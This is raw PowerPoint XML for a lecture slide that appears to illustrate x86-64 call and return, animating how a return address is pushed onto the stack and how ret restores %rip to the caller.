                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D0923C6-D420-B04F-A037-CB017FB1F291}"/>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5" name="Rectangle 224">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{162FFB27-D1CF-B74C-BE27-FA42039C42F1}"/>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6" name="Rectangle 225">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E74E873-B492-4B4C-A018-2DB2AE80FBB1}"/>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7" name="Rectangle 226">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7AB8991-E73A-9441-A4D1-E2F85CDB7DB0}"/>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228" name="Rectangle 227">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE6775FD-8E58-4542-97E7-6A250816CDB9}"/>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229" name="Rectangle 228">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56BF14F9-F642-8940-B828-ADB1F43D6DF6}"/>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nvGrpSpPr>
            <p:cNvPr id="213" name="Group 212">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70D0B272-56ED-504A-A73C-1ECCD056107A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="2753696"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="214" name="Rectangle 213">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44DE406D-474A-1F41-97ED-A3997034A44E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920884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5" name="Rectangle 214">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{238AEB1D-9216-7A40-93CB-A0D987C3C5E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="945061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6" name="Rectangle 215">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34DCB235-4545-2E40-B4A4-8C9F59256D53}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="969238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7" name="Rectangle 216">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F843FE-6EF0-9649-99BC-EDB935F874E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9934159"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8" name="Rectangle 217">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F74D2673-F2A7-0D47-B16C-E5CC6A4C03FC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10179379" y="3986005"/>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9" name="Rectangle 218">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB1CB8DE-16CA-C34F-B57C-A82B7E055491}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1042149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0" name="Rectangle 219">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D621351-4DF7-5242-A485-98A0E12C4E27}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1066671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1" name="Rectangle 220">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30639764-F61D-774D-ABFD-EA3C845FA952}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10903803"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DAD1580-9BA7-F84C-8983-9E5D419D87D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1900402" y="5577826"/>
            <a:ext cx="3630037" cy="338554"/>
            <a:chOff x="8546768" y="3218160"/>
            <a:chExt cx="3630037" cy="338554"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="TextBox 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61E8EFF3-E50E-DF4A-9573-C58A0F474244}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8546768" y="3218160"/>
              <a:ext cx="576943" cy="33855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600">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ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="128" name="TextBox 127">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4508FA77-B610-3C42-B6B7-E83654B1EA55}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9197721" y="3218160"/>
              <a:ext cx="2979084" cy="33855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600">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     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>pushq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> 0x400648</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="254" name="Group 253">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CDF40A5-69E9-5B47-924B-4F052583D7E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5554919" y="3760081"/>
            <a:ext cx="2667619" cy="369332"/>
            <a:chOff x="8434922" y="6044017"/>
            <a:chExt cx="2667619" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="255" name="TextBox 254">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C7057F-EF6C-CB41-85DE-39BBBCC81357}"/>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0x7FFFFFFFE008</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="256" name="Straight Arrow Connector 255">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC9AD31-EBB1-D748-A981-CB609C004DC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="255"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57" name="TextBox 256">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D68FCF3-97B1-0E42-9E66-BF320BDBAAB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899615" y="4341683"/>
            <a:ext cx="2444900" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="682625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%rip =	0x7FFFFFFFDFFD</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="258" name="Straight Arrow Connector 257">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF47A534-F32D-2D4A-BA2E-364F369BC37F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="257" idx="1"/>
            <a:endCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2477345" y="4664849"/>
            <a:ext cx="4422270" cy="10822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A9104903-AB53-1C4E-88C1-47973708AE9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899615" y="4339472"/>
            <a:ext cx="3802644" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="682625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%rip =	0x400648 – in caller()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov    $0x400730,%edi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="262" name="Group 261">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C1B9401-4A52-C141-9A2B-B4E539665C56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5553649" y="2975667"/>
            <a:ext cx="2667619" cy="369332"/>
            <a:chOff x="8434922" y="6044017"/>
            <a:chExt cx="2667619" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="263" name="TextBox 262">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F954414A-41C5-5A46-AEB9-8327D4927D99}"/>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0x7FFFFFFFE010</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="264" name="Straight Arrow Connector 263">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B6F3D93-B26A-CB45-8DE1-9F6D80DFFFE9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="263"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36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500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="138"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="138"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="9" presetClass="entr" presetSubtype="0" fill="hold"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14" presetClass="entr" presetSubtype="5"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vertical)">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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18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5"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randombar(vertic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87"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="187"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="188"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="188"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="38" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="195"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="195"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="41" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolv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xit" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="188"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="188"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="49" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="198"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19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grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="198"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="198"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="57" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="200"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="200"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="60" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="204"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="204"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="63" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="195"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="195"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="66" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="67" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="207"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="207"/>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5" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="208"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="208"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="75" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="254"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="254"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="78" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="204"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="204"/>
                                        </p:tgtEl>
